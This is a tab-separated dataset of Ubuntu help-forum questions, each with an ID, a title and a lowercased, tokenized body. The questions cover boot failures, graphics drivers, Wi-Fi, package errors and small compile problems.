404111	how do i set unity launcher to auto hide	i just installed 13.10 , and i ca n't seem to find how set the unity panel ( launcher ) to auto-hide . can someone direct me to where the option is ? a search in the settings shows no results . a search on askubuntu reveals several threads with hiding issues and how to fix them using tools . but does n't tell me where i can find the simple auto-hide option to begin with . does the default installation contain such an option , and if so , where ? do i need to install some tools to get this option ? if so , should n't such a basic option already be there ?
404112	touchpad lost gestures and touchegg requres hack ?	i 've had some success getting my touchpad to be usable by configuring syclient ( although it was surprising that this was necessary ) . reading around i find that many gestures have been removed from 13.04 > > , but the underlying code that favours these ( now non-existent ) gestures is still there preventing touchegg from working . i should be able to get touchegg working by `` hacking '' unity , but as it turns out i 'm getting compile issues ... .. is there another way of getting gestures working ? please ... .
404116	i 'm still on windows 8 , will my firewall ( bitdefender total security ) still function on ubuntu 12.04 ?	i just payed a butt-ton for a firewall ( bitdefender total security ) i 'm worried that it wo n't be compatible or i 'll have to to re-install it on ubuntu ?
404117	can not access internet due to tampering with resolv.conf	i 'm running ubuntu 13.10 and attempted to fix an issue with running wicd through the instructions from this answer . after following these instructions , the program wicd works , and my wired and wireless connections are fine , but i can not use the internet anymore . my browsers give me errors as if i am not connected . are there suggestions to `` undo '' the command line steps i made ?
404122	blank screen , cursor blinking on boot after install disruption	i finished building a computer and started installing ubuntu when the power went out . now , whenever i try to boot , absolutely nothing gets displayed except a black screen with a single blinking cursor on the screen . i have tried holding down shift upon boot , but none of the options can be selected . no keyboard buttons or commands work except for ctrl+alt+del which restarts everything and goes right back to the blinking cursor . i am completely lost at this point as to what to do .
404123	reboot occurs due to network activity	i am having constant reboots occur when i am browsing the web , downloading , performing wget from the terminal , etc . this is something new and i can not pin-point what i may have done to cause it . i 'm sure there is a log file of some sort that can be examined but i do n't know how to go about doing that . i do n't believe it to be a hardware issue due to the fact that i am dual-booting with windows 7 and everything works fine with it . has anyone else ran into a similar issue and been able to correct it ? i certainly hope so .
404124	gnupg encrypted copy of sent message	how do i create an encrypted copy of a message , for my own records , before i send it to the recipient ? that is , i want to send an encrypted message to bob and i want a copy of this message , encrypted with my key that i do n't send to bob but keep for my records . does anyone have any code for this procedure ? currently i 'm using : echo `` message '' | gpg -- encrypt -a -r bob ... which returns to stdout , from which i copy and paste over my previous unencrypted email .
404126	lenovo g580 brightness	i recently acquired a new laptop , a lenovo g580 ( i5 , 4gb ) and i am experiencing some issues with the brightness control in ubuntu . i think that is because of the nvidia vga ( which is integrated with the i5 , hd4000 graphics ) . i have tried many `` solutions '' without success . as i am totally novice with linux ( but not with computers ) , please , try to be explicit in answers , this would really help . i have modified the grub with backlight=vendor , making possible to see the brightness control bar , but when y slide it it make no changes at all in the bright who is always at maximum . i have also tried re-installing ubuntu 12.04 lts and 13.10. p.s . i apologize about my english ...
404130	macbook air : blinking cursor after grub	i installed ubuntu 12.04 on my macbook air ( 6,2 , mid-2013 13 '' ) and when the installation was complete i had to reboot my computer . i am using refind and dual booting ubuntu with os x mavericks . then i rebooted , selected linux in refind and it booted up into gnu grub . my problem is : when i select hits enter in gnu grub and it is supposed to start ubuntu , it stops at a blinking cursor . what is wrong ? thank you and sorry for bad english : - )
404132	installation of ubuntu 12.04 inside windows with out internet	how can i install ubuntu 12.04 in my windows 7 pc with out accessing internet . i already downloaded the image file . kindly help me
404134	unable to use a live usb .	update to 64-bit 12.04lts fails . i remade the liveusb once using startup disk creator , and twice using unetbootin . i then , thinking it was the usb , used a different one using unetbootin . also a failure . i have an hp 2000-2d69nr notebook pc , 1.75ghz amd e2-2000 cpu , 4gb ram , amd radeon hd 7340 discrete-class graphics , 500gb hdd with ubuntu 12.04lts amd .
404140	installing opengl driver installer to ubuntu 12.04 lts , error message while opening download	when i attempt to install opengl driver installer on ubuntu 12.04 lts , when i open the .exe file `` setup '' i get the message archive : /home/fetrow/downloads/setup.exe [ /home/fetrow/downloads/setup.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/fetrow/downloads/setup.exe or /home/fetrow/downloads/setup.exe.zip , and can not find /home/fetrow/downloads/setup.exe.zip , period . i do not understand why this is , and opengl is necessary to software such as source engine which i use often . this is prompted by an error message when running tf2 , `` could not find required opengl entry point 'glgeterror ' ! either your video card is unsupported , or your opengl driver needs to be updated '' my computer is a store-bought intel and i researched that opengl is installed with the operating system , so can anyone help me with this ?
404141	why ca n't i pipe into cd ?	why ca n't i pipe stuff into cd ? example : $ pwd > > ~/mloc $ cd / $ tail -n 1 ~/mloc | cd cd fails . if do : cd $ ( tail -n 1 ~/mloc ) , it works . i understand the last command i wrote works , but i do n't understand why i ca n't pipe into cd .
404142	display contents of one folder in another	is it possible to show all the files from one folder in another on ubuntu ? a bit like libraries on windows ? more specifically i want files from a specific folder in my local google drive folder to be shown on my desktop . maybe i could assign a custom function to a shortcut key which would loop through the google drive folder and recursively symlink the files onto the desktop . the only problem then would be having delete both the file and the symlink when the file is finished with . any ideas would be greatly appreciated !
404148	google earth display problems - no imagery and flickering	google earth installed fine and loads up ok but it never shows me any background imagery . also the top of the display flickers intermittently even when nothing is moving . see screenshots below . i do n't know where to start so i have n't tried anything yet . i do n't seem to be having any display problems in other applications or in unity . the launcher icon is also missing but that is obviously a lesser issue . ubuntu 13.10 32-bit ( unity dm ) lenovo thinkpad x60s google earth 7.1.2.2041 any suggestions much appreciated .
404149	how to share keyboard and mouse via bluetooth ? ( like in windows control )	the goalafter pairing a host windows machine to a ... 1 . -another windows machine 2 . -android machine : phone/tablet/etc ... i can use my hosts keyboard and mouse to control it . i can not do this in ubuntu ( better said , i do not know how and can not find the right keyword to search for in synaptic ) any help would be appreciated .
404158	black screen with white dash/underscore flashing when i try to install ubuntu 12.10 from liveusb ?	about my computer : os : windows 8.1 64-bit cpu : intel core i7 4770 @ 3.40ghz ram : 8 gb motherboard : gigabyte h87-hd3 graphics : intel hd graphics 4600 and 1024mb ati amd hd radeon 7700 so , i tried to install ( dual boot ) ubuntu 12.10 64-bit from a liveusb , but when i boot from usb and `` install ubuntu '' , the screen goes black and there is a white dash/underscore flashing . after some seconds i hear the sound that plays when ubuntu boots , so i 'm pretty sure that the computer actually starts the setup , but i ca n't see anything for the reason i said above . i have actually used ubuntu 12.04.3 lts via wubi before ( i found a video for instructions on how to use wubi on windows 8 . i did n't know that wubi was n't for windows 8 , so when i found that out , i was surprised that it worked . but then i had to upgrade to windows 8.1 , so my installation got ruined . i did n't know i could fix it , so i uninstalled wubi and ubuntu ) , so i know my computer can support it . but now that i know that wubi is n't for windows 8.1 , i would rather not risk using it again , if possible . and when i go to `` try ubuntu without installing '' , it runs on low-graphics mode , so i ca n't install it from there either . and i ca n't use ubuntu 13.10 because i ca n't find any drivers for my pc to use hdmi . [ edit : i was mistaken . the same black screen is shown on `` try ubuntu without installing '' . my bad. ] thanks in advance . edit2 : i just noticed that i do n't get the black screen if i go to the install from uefi . however , there would be no point in trying to install it that way since according to msinfo32 on my windows 8.1 , my bios is in legacy mode ...
404160	can not install adobe air on 13.10 ; i386 pkgs do n't exist	i need adobe air for an important software that is only delivered via that platform , but it 'll be used on a box that has ubuntu x64 . so there 's no way around that . from my research , the consensus is that : adobe no longer supports linux as of v2.6 the final v2.6 *.bin file can be installed , but needs 32-bit libraries since ia32libs is deprecated , one must do some hacking to get the whole thing to work so , i 've been following along here , which seems to me to give the clearest directions : http : //www.randomhacks.co.uk/package-ia32-libs-gtk-has-no-installation-candidate-ubuntu-13-10/ i also found a .deb somewhere , but run into essentially the same problem , which i will describe below . # ./adobeairinstaller.bin /tmp/air.otfpvm/setup : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory i can not get the 32-bit libraries required for the solution , and i do n't know how to acquire them . they are needed for the adobe air installer to proceed properly . i need to be able to execute this command to get the .deb to work , which should also give me what i need for the normal installer as well : sudo apt-get install libgtk2.0-0 : i386 libnss3-1d : i386 libnspr4-0d : i386 lib32nss-mdns libxml2 : i386 libxslt1.1 : i386 however , doing so yields a mystifying error about not being able to find said packages : $ sudo apt-get install libgtk2.0-0 : i386 libnss3-1d : i386 libnspr4-0d : i386 lib32nss-mdns libxml2 : i386 libxslt1.1 : i386 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libgtk2.0-0 e : could n't find any package by regex 'libgtk2.0-0' e : unable to locate package libnss3-1d e : unable to locate package libnspr4-0d e : unable to locate package libxml2 e : unable to locate package libxslt1.1 e : could n't find any package by regex 'libxslt1.1' i apologize if this is n't very clear , i 've been working at this most of the day . basically , i have two possible solutions -- the .bin installer or the .deb file -- but i ca n't get either to work because of the unavailable 32-bit libraries . i 'm afraid this is beyond my skills , and i would kindly ask your help in solving this problem . feel free to ask for clarification . cheers , preston
404163	ca n't boot ubuntu after installing ubuntu 12.04 lts	i 'm getting in problem when installing ubuntu 12.04 lts with a cd-rom . after rebooting , there 's a notice says , `` disk boot failure , insert system disk and press enter '' . even though i input the cylinders , heads and sectors into the bios , it does n't work . thanks for your help : ) & sorry for my bad english .
404166	using boinc for new platforms	i have a new utilite pro system ( quad core cortex a9 w/ 2 gb ram ) . system came preloaded with ubuntu 12.04 . i have downloaded boinc and boinc-manager packages . after not finding any `` projects '' with `` arm '' work to be performed , i installed `` boinc-app-seti '' ( which i thought provided something that would permit new system `` types '' like this one ) to run seti jobs . it took a while to have this system delivered . boinc used to a have a text based wiki page with details for each system 's os and hardware type supported . when i acquired this system , i thought that i 'd seen several projects with arm-linux support . the recent changes ( changing system types to small icons ) have made it hard to identify any candidates . by goal would be to connect this system to a boinc project that would provide jobs for the arm cortex a9 processor . if not available , i 'd be glad to run seti jobs ( if i can get then to run and permit downloads to this system type ) . any pointers/links would be appreciated .
404167	which driver to be used for geforce	i have geforce6150se nforce430 graphic card . i m using proprietary tested driver . i quited open source driver ( used mare than 6 months ) as last time it gave me a problem ( low graphic mode ) due to this i had to reinstall ubuntu 12.10 . i had left with only that option ( solutions on net did not worked ) so which driver is saver to use ( i do n't want to get that problem again )
404171	how to live streaming on youtube ?	i 'm looking for a way to stream to youtube live on my computer . i know there are various tools available for windows , but i have n't found anything for linux . i prefer not to use g+ hangouts , but go right to actual streaming . does anybody know of any tools for linux that will stream to youtube live , or is there a windows tool that works without any issues under wine ?
404172	zpools do n't automatically mount after boot	running ubuntu 13.10 server . installed and setup zfs from the ubuntu ppa . all appears to work fine after a reboot if i manaully do a 'sudo zfs mount -a ' , but reading the faq on zfsonlinux.org it appears i should expect it to automatically mount . not sure where to look to debug . i do n't see any errors in /var/log/syslog related to zfs or mounting . $ sudo zfs get all zp name property value source zp type filesystem - zp creation sat mar 16 17:14 2013 - zp used 464g - zp available 449g - zp referenced 13.3m - zp compressratio 1.00x - zp mounted no - zp quota none default zp reservation none default zp recordsize 128k default zp mountpoint /zp default zp sharenfs off default zp checksum on default zp compression off default zp atime on default zp devices on default zp exec on default zp setuid on default zp readonly off default zp zoned off default zp snapdir hidden default zp aclinherit restricted default zp canmount on default zp xattr on default zp copies 1 default zp version 5 - zp utf8only off - zp normalization none - zp casesensitivity sensitive - zp vscan off default zp nbmand off default zp sharesmb on local zp refquota none default zp refreservation none default zp primarycache all default zp secondarycache all default zp usedbysnapshots 25.3k - zp usedbydataset 13.3m - zp usedbychildren 464g - zp usedbyrefreservation 0 - zp logbias latency default zp dedup off default zp mlslabel none default zp sync standard default zp refcompressratio 1.00x - zp written 13.3m - zp snapdev hidden default
404173	how do i find the package name for an application that i want to uninstall ?	i tried sudo apt-get -- purge remove snipe2d but i guess 'snipe2d ' is n't the name of the game ... .so how do i find out what it is and how to put it into my terminal ? p.s . this is what it says when i put in the above code : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package snipe2d edit : the official name of the game in question is : orbital eunuchs sniper
404174	wifi suddenly wont connect ?	i gt my new laptop with ubuntu 12.04.. my wireless connection was working fine till yesterday . now suddenly it doesnt detect at all . it doesnt detect any new connections either .my wired ( eternet ) connection works . i have tried rfkill.. they are all unblocked . iwconfig returns : siddarthcr @ sid : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . ifconfig returns : siddarthcr @ sid : ~ $ ifconfig eth0 link encap : ethernet hwaddr 74:86:7a:3f:74:84 inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :7686:7aff : fe3f:7484/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:750 errors:0 dropped:0 overruns:0 frame:0 tx packets:814 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:391259 ( 391.2 kb ) tx bytes:127493 ( 127.4 kb ) interrupt:42 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:178 errors:0 dropped:0 overruns:0 frame:0 tx packets:178 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:19962 ( 19.9 kb ) tx bytes:19962 ( 19.9 kb ) wlan0 is not detecing at all : siddarthcr @ sid : ~ $ ifconfig wlan0 up wlan0 : error while getting interface flags : no such device siddarthcr @ sid : ~ $ lspci -nnk | grep -iea3 `` ( wireless|network ) '' 02:00.0 network controller [ 0280 ] : qualcomm atheros qca9565 / ar9565 wireless network adapter [ 168c:0036 ] ( rev 01 ) subsystem : dell device [ 1028:020c pls help..any help would be really appreciated..
404176	i ca n't install ndiswrapper	i built a computer and installed ubuntu 13.10 . i 've never used linux before . i have installed in it a wireless network card , broadcom bcm4318 , chip 14e4:4318 . i 'm told that to use it i need to install ndiswrapper , so i downloaded ndiswrapper 1.59 . i followed the instructions in the package- navigating to the directory of the tarball , extracting it using tar zxvf ndiswrapper-version.tar.gz then going to the install file , doing what it said : make uninstall make login as root and run make install and now i 'm trying to run ndiswrapper , and the terminal says it is n't installed , but i can install it using sudo apt-get install ndiswrapper-common so i type that in and it says e : unable to locate package ndiswrapper-common and here i am , stuck , as if i have done nothing . i 'm tearing my hair out over here , nothing appears to work . all i 'm trying to do is something that every internet guide claims is easy , yet every one of them has a different set of instructions for doing so . how do i install my damn wireless network card ?
404180	gfx card crashed , dash slow , what can i do ?	so , my graphics card ( geforce 550ti ) took a crap the other day , fan blades broke and flew off and yeah ... a mess . now my ubuntu install is slower than hell . i click the icon or press super and the dash takes 2-3 seconds to figure out what to do , then it jumps up and lags for about 5 seconds and then shows up . after that , all 's good , it 's rather speedy , but still jumpy . until i can afford a new card , what can i do to obtain better performance out of the dash ? it 's also possible that i 'm not using the correct driver , of course . i installed the proprietary tested driver nvidia-304 . the card i have is currently is an old integrated one : geforce 6150se nforce 430/integrated/sse2 . should i be using a different driver ? my system is n't a bad one : 8gb ram , amd phenom ii quad core 3.4ghz ... so besides the graphics card , the system should be snappy ... no ? thanks in advance for any info .
404185	kde wo n't fully remove	this is not a duplicate . the solution in how to remove all traces of kde installed did not work , so please do not mark this as a duplicate ( it ruined the last post i made ) . i am using unity , but kde is still available on the login screen . i have uninstalled it , and all of its programs , but it wo n't go away . i did an installation of kde-full to try it , but i did n't like it and want to go back to just unity . thanks in advance . ps this installation is not kubuntu . update : kde plasma is still an option on the login screen , and choosing it opens a perfectly working kde session . i have a 128gb ssd , so space is valuable . update : kdevelop is n't that important . i do n't have any custom configs , so if it gets deleted , i can reinstall it quickly .
404190	ubuntu 12.04.lts alongside windows 8 boot menu not shown	i bought acer aspire v5 laptop with windows 8 pre installed , upgraded to windows 8.1 and i have two partitions c and e. i have used disk management to shrink e to form an unallocated space and restarted the laptop twice . i went to uefi and disabled secure boot . after that i inserted bootable ubuntu 12.04 lts dvd and it has not detected my windows 8 . i chose the `` something else '' option and installed ubuntu in the unallocated space . now , whenever i start the laptop , boot menu is not shown but ubuntu is loaded straight away instead . i tried with boot repair in ubuntu , but it showed repair failed with url http : //paste.ubuntu.com/6732706/ . also when i click update manager in ubuntu 12.04 lts ... it has listed three updates namely : 1 ) interact with efi boot manager 2 ) grub version 2 ( efi-amd 64 binaries ) 3 ) secure boot updates for db and dbx , where i can check mark only 3rd option . now when i click `` install updates '' , its asking me into insert `` ubuntu 13.10 saucy slander dvd '' . even after inserting that..no use..technically i could not understand why its asking fro 13.10 dvd when i use 12.04 lts..
404194	installing ubuntu server on a new system shipped with freedos ( amd-64 ) , partitioning help	i bought a new system shipped with freedos , while installing ubuntu server in the partitioning phase , i get 3 columns : # 1 primary 1 gb b fat32 , # 2 primary 1gb ntfs the free space . what should be done with the # 1 and # 2 . there is no option to swipe those partitions . moreover i good guide on lvm and raid would be really helpful .
404195	live usb corrupted	need your help . i was using the lts version via usb drive on , 5 days earlier i downloaded the latest 13.10 version and decided to install on the laptop . i 've win xp installed on my system . so i tried to make the live usb as my optical drice doesnt work anymore , to my surprise after the formatting was complete the totla size of the usb was only 983mb , while its a 14gb stick . this is the same usb on whicl i was using the lts version . i used the poweriso software to make the live usb , same was used earlier also . first i thought it may be a problem with the software itself so i borrowed another usb from my friend of 4gb , the process completed successfully and the system even booted from the usb . i turned ot off and booted the xp and inserted the usb it again showed the same , total size 983mb . now both usb sticks are corrupted , is there any way to recover the usb ... ?
404197	issues with idle	i ca n't run programs with idle or any files saved with idle . i get a syntax error . i was just testing it out with print `` hello world '' . this is the message i am receiving file `` p.py '' , line 1 python 2.7.3 ( default , sep 26 2013 , 16:38:10 ) ^ syntaxerror : invalid syntax why is it reading the title ? how can i fix this ?
404200	make some files be persistent between system formats ?	i have an ubuntu laptop i use as a plex server , seedbox , dns cache and ad filter for my home network . since it 's the only computer in the house that does n't get shutdown , i have a tendency to load random stuff onto it just to have a play . this results in it needing to be formatted and reinstalled every now and then ( because sometimes i manage to break things pretty damn bad ) . i 'd like to be able to keep my customised stuff somewhere ( i have three external drives attached to the laptop ) so that i can format the laptop 's internal drive and reinstall ubuntu , and then just run a script or mount a directory to have the things i want to reappear . if i could simply store the config files for transmission , apache2 and plex ( etc ) on an external drive and overlay them on the appropriate directories , that 'd be perfect . i 've looked at overlayfs but i 'm not sure if that 's the best solution because i do n't want to overlay an entire filesystem ( any apt-get upgrades would be stored on the external drive , right ? ) , and i 'd like to be able to browse the config files on my external drive without having to mount a squashfs or something .
404208	can not write bytes : broken pipe	i uninstalled 11.04 and installed 12.04 and grub was not detecting the partitions , so i fixed it with boot-repair and 12.04 loaded perfectly , then i tried to install the device driver for nvidia graphics card and it took a long time , so i stopped it and shut down.when i restarted the computer i got the message can not write bytes : broken pipe.then i followed this thread for help . could not write bytes broken pipe 12.04 i went to recovery mode and drooping to root prompt and typed this command sudo gedit /var/log/apt/history.log for this i got the following error message as gedit did not open that file : ( gedit : 856 ) : warning : command line 'dbus-launch -- autolaunch=somernadomnumbers -- binary-syntax -- close-stderr ' exitted with non-zero exit status 1 : autolaunch error : x11 initialization failed . \n can not open display : run 'gedit -- help ' to see a full list of available command options . did this happen because of stopping the installation of nvidia device driver in the middle of its installation ? i am running 12.04 with winodws 7 dual boot.any help would be appreciated . when 12.04 was working normally i started and quit in the middle of the installation of the grahpics driver for nvidia grahpics card and i restarted the computer and got the could not write bytes : broken pipe error .
404210	ca n't install boot repair	i installed ubuntu 13.10 ( along-side windows 8 ) twice it showed up grub menu ( both times i logged on to ubuntu ) . the third time i chose windows and since then grub does n't show up . i tried to install boot repair . typed the command sudo apt-add-repository ppa : yannubuntu/boot-repair i got the following error : can not add ppa : 'ppa : yannubuntu/boot-repair ' . please check that the ppa name or format is correct . i have 48gb of space for ubuntu ( set as root ) and 2gb of swap
404220	error no such partition grub rescue and stuck at start windows normally after boot repair	so i originally have windows 7 but i installed ubuntu 12.04 alongside it . everything was fine until i clicked on system recovery while i was running windows ( i thought it will fix the long booting process . configurating was taking too long when shutting down and booting the system , so i did it . ) then my windows wo n't boot . i get to the 'start windows normally ' but it just gets me back to the same options when i press enter . i thought installing ubuntu again would fix the problem but after awhile , the ubuntu screen were all lines , and when i rebooted my acer laptop , i got to the error no such partition , so i decided to look for solutions online . i tried doing the sudo apt commands i found in forums and it did remove the error in grub . now i am back again at the 'start windows normally ' and 'launch repair'- any of the options dont work . i do not have a windows repair disc or something . i really need both os to be back and running without losing my data . please help . i have found similar cases , but not the exact same case as mine .
404222	file `` /usr/lib/update-notifier/package-data-downloader '' , line 29 , in < module > import debconf	so , i 'm trying to install the flash player plugin , but it says update-notifier-common is not configured . so i do sudo dpkg -- configure update-notifier-common and it displays traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 29 , in < module > import debconf importerror : no module named debconf dpkg : error processing update-notifier-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : update-notifier-common but sudo apt-get install debconf gives setting up update-notifier-common ( 0.147.1 ) ... traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 29 , in < module > import debconf importerror : no module named debconf dpkg : error processing update-notifier-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of flashplugin-installer : flashplugin-installer depends on update-notifier-common ( > = 0.119ubuntu2 ) ; however : package update-notifier-common is not configured yet . dpkg : error processing flashplugin-installer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : update-notifier-common flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so , it looks like i ca n't configure update-notifier-common until i 've installed debconf , and i ca n't install debconf until i 'll installed debconf and configured update-notifier-common . help ?
404223	problem using `` sudo su '' command	when i use `` sudo su '' cmd termianl asks for the root passwd . but after one successful login it never asks for authentication again . i want it to ask for authentication everytime .
404230	editing file in ubuntu one	i have uploaded a file to ubuntu one . i got to edit it and update it very often . is there any i can in which i can edit file ( spreadsheet ) in ubuntu one ? i used google drive , i could create and manage file there . can i sync my file in documents folder with 'file in ubuntu one ' such that , when i edit the file in my computer , file should be updated inside ubuntu one ? thank you .
404234	sound problem in skype 4.2 in ubuntu 13.10	from rhythmbox , i have confirmed that sound output device is working fine , internal mic/external mic are working as per movement of bar in input device section of pulseaudio . however , when i start skype 4.2 in 64 bit ubuntu 13.10 , neither i/p nor o/p sound devices appear to be working . pulseaudio ( local server ) is enabled under skype audio settings . any guidance would be appreciated . p.s . while answering the question , please keep in mind that i am a novice .
404235	virtualbox bridge connection getting disconnected frequently	this is an issue in oracle virtualbox running on ubuntu 12.04 . the guest os is ubuntu 11.04 running on host ( ubuntu 12.04 ) . network settings - > network - > bridged adapter this network connection between host and guest is getting disconnected frequently . is there a solution to keep it connected always ?
404239	how to deal with the `` make install '' error ?	i have a source code and i have to compile it to have some .exe files . when i compile it by running the make install command , these messages appear in the terminal : if [ ! -d /opt/yhym/ ] ; then mkdir /opt/yhym/ ; fi if [ ! -d /opt/yhym/bin/ ] ; then mkdir /opt/yhym/bin/ ; fi if [ ! -d /opt/yhym/data/ ] ; then mkdir /opt/yhym/data/ ; fi if [ ! -d /opt/yhym/utl/ ] ; then mkdir /opt/yhym/utl/ ; fi if [ ! -d /opt/yhym/utl/gradssc ] ; then mkdir /opt/yhym/utl/gradssc ; fi cp -pu bin/* /opt/yhym/bin/ cp : omitting directory `bin/btop ' cp : omitting directory `bin/datapreparation ' cp : omitting directory `bin/sw ' cp : omitting directory `bin/yhym_snow ' cp : omitting directory `bin/yhym_sup ' cp : omitting directory `bin/asc2vlm ' cp : omitting directory `bin/calc_extra_pds ' cp : omitting directory `bin/calc_extra_pds2 ' cp : omitting directory `bin/calc_srmax ' cp : omitting directory `bin/subset_gimms ' cp : omitting directory `bin/subset_cru1 ' cp : omitting directory `bin/subset_cru2 ' cp : omitting directory `bin/subset_cru3 ' cp : omitting directory `bin/subset_glcc ' cp : omitting directory `bin/subset_pal_ndvi ' make : *** [ install ] error 1 how do i get rid of this error ?
404246	how do i safely remove ubuntu 12.04 lts from a dual-boot with windows 8 ?	i installed ubuntu 12.04 lts yesterday , and ran into a few problems ( windows not booting.. ) however , i think i fixed that by booting windows 8 in 'uefi recovery ' ( or something like that ) - there is no discernible difference between the windows i am running now and the windows i was running before . however , i would like to uninstall ubuntu , but i do n't want to mess up my computer ( again ! ) how do i go about doing this safely ? i did some research and found these 2 conflicting youtube videos , explaining 2 different ways of doing it : which way should i use ? and if none of those youtube videos are correct , which way should i use ? http : //www.youtube.com/watch ? v=tce3gkzwqsy http : //www.youtube.com/watch ? v=mtdcwleu6ng i am using a lenovo z500 laptop , if that 's of importance . thanks in advance .
404248	xournal : working on 2 documents simultaneously ?	i want to annotate a pdf in xournal while at the same time having another xournal document open to make some calculations . is that possible ? ( problem : if i open a pdf document on xournal to annotate it and then click on `` file - > new '' the annotated document disappears ( is closed ? ) and i have to open it anew . ) details : ubuntu 13.10 , unity , xournal 0.4.7
404253	how to fix âthe system is running in low-graphics modeâ error ubuntu 13.10 ?	i started getting this message suddenly then i re-installed the nvidia drivers and still i am getting the same error . right now i have installed nvidia 304 driver and my card is gt 520m . ( gateway nv59c laptop ) i actually did several hacks and found out a way to get the lightdm working normally . but for this everytime i boot i need to load the nvidia drivers manually and then if i restart the lightdm i get the unity greeter and it works fine . these are the commands which i run every time to get the gui . # stop lightdm sudo /etc/init.d/lightdm stop # check whether the nvidia display driver is loaded or not sudo /sbin/lsmod | grep nvidia # load nvidia driver manually sudo modprobe nvidia_304 # start the lightdm sudo /etc/init.d/lightdm start and my lightdm.conf has this line greeter-session=unity-greeter but i do n't know what 's wrong . i do n't want to re install ubuntu from scratch . if that 's the only option i have got then i would . thanks !
404255	how to run a program automatically on printing	i developed a simple application that show on screen my printers ink levels . i 'd like to run this program automatically every time that ubuntu send to the printer the print command . can anybody help me ?
404261	how to install ubuntu on asus fonepad ?	i still could n't find s solution for running linux on my tablet and i dont want any hitches as the tablet is of great importance to me for my day today work . kindly give me a solution to install and run ubuntu on my tablet smoothly .
404263	problems with ubuntu 12.04 on dell laptop	i just bought a new dell inspiron 15 3521 with ubuntu 12.04 lts preloaded . now i am having a few problems with my os which i am listing as following whenever i hibernate the system and restart it later , i get a blank screen . i have to make a fresh start to bypass this problem . on restarting the system , sound is muted by default . i had dell recovery image stored on my usb pen drive . now suddenly , the os refuses to recognize the pendrive when i plug it in . plus , while operating the system , if my wired broadband connection breaks and then restarts , it still says that wired connection is disconnected.i have to restart the system . can anyone suggest me a stable solution ?
404267	how to autorun bash script in terminal as root ?	i 'm trying to make this script to autorun at startup , it needs root priviges , but i 'm trying to run it without typing in my password . i have tried to add it with crontab , but nothing seems to happen . this is the script im trying to use sudo rmmod xpad sudo xboxdrv -- silent -- mimic-xpad
404268	ca n't view streaming program	i am almost new in ubuntu ( so i need detailed help ) and i am not able to view sport streaming events on the web . i have problem with eurosport ( on eurosportplayer ) youtube on the faqs for eurosport player is written that the player do not support linux for silverlight reasons , but i find a lot of guide to bypass this problems ( i downloaded some plugins that i do not remember the names ) . it seems it works with moonlight but it is not supported yet , so i need another way .
404272	how to instal ubuntu 13.10 [ pre downloaded ] over windows 7 using wubi ?	i have pre downloaded ubuntu 13.10 iso . i want to install ubuntu 13.10 pre downloaded iso using wubi without downloading it again during the installation of wubi . is there any possibilites like that ?
404275	set f-keys primary instead of special keys on lenovo	i have a new lenovo e540 which has the special keys like volume change and such on the f-keys here . so to actually use the f-keys the fn has to be pressed to , so when using alt+f4 i have to press alt+fn+f4 which is very inconvenient . in the bios it is possible to swap the fn and ctrl keys so the f-keys are primary again but then the functionality of the fn and ctrl key are really swapped ! is there probably a solution where the functionality of the fn and ctrl key remain and the f-keys are primary ?
404279	morse code representation not working in ubuntu	the example source code for reproducing morse code as sound does not work in ubuntu : # include < iostream > # include < string > # include < ctime > using namespace std ; const string s_dot = `` \a '' ; const string s_bar = `` \a\a\a '' ; inline void timesleep ( clock_t sec ) { clock_t start_time = clock ( ) ; clock_t end_time = sec * 1000 + start_time ; while ( clock ( ) ! = end_time ) ; } //timesleep inline void shortpause ( ) { timesleep ( 1 ) ; } //shordpause inline void longpause ( ) { timesleep ( 2 ) ; } //longpause int main ( ) { // sos in morse code cout < < s_dot ; shortpause ( ) ; cout < < s_dot ; shortpause ( ) ; cout < < s_dot ; shortpause ( ) ; cout < < s_bar ; shortpause ( ) ; cout < < s_dot ; shortpause ( ) ; cout < < s_dot ; shortpause ( ) ; cout < < s_dot ; shortpause ( ) ; return 0 ; } my sound settings should be ok as i am able to open and listen to music ( i.e . from youtube ) . could you please advise ?
404282	where is my glut ?	i try to compile c program : # include < gl/glut.h > # include < gl/glew.h > # include < gl/gl.h > # include < gl/glu.h > void main ( int argc , char **argv ) { glutinit ( & argc , argv ) ; glewinit ( ) ; if ( glewissupported ( `` gl_version_2_0 '' ) ) printf ( `` ready for opengl 2.0\n '' ) ; else { printf ( `` opengl 2.0 not supported\n '' ) ; exit ( 1 ) ; } setshaders ( ) ; glutmainloop ( ) ; } using : gcc -lglew -lglu -lgl - lglut c.c i got an error : gcc : error : lglut : no such file or directory so i check : locate glut.h /usr/include/gl/freeglut.h /usr/include/gl/glut.h /usr/share/doc/freeglut3-dev/freeglut.html also : locate glut.so /usr/lib/x86_64-linux-gnu/libglut.so /usr/lib/x86_64-linux-gnu/libglut.so.3 /usr/lib/x86_64-linux-gnu/libglut.so.3.9.0 what should i do to make it compile ?
